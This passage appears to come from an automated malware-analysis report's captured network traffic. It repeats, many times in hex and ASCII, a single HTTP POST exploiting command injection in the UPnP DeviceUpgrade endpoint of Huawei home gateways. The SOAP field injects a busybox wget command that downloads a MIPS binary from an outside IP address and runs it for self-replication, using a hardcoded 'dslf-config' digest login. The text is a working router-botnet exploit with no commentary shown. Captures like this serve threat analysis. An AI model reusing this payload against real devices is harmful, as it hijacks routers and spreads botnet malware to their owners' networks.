69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 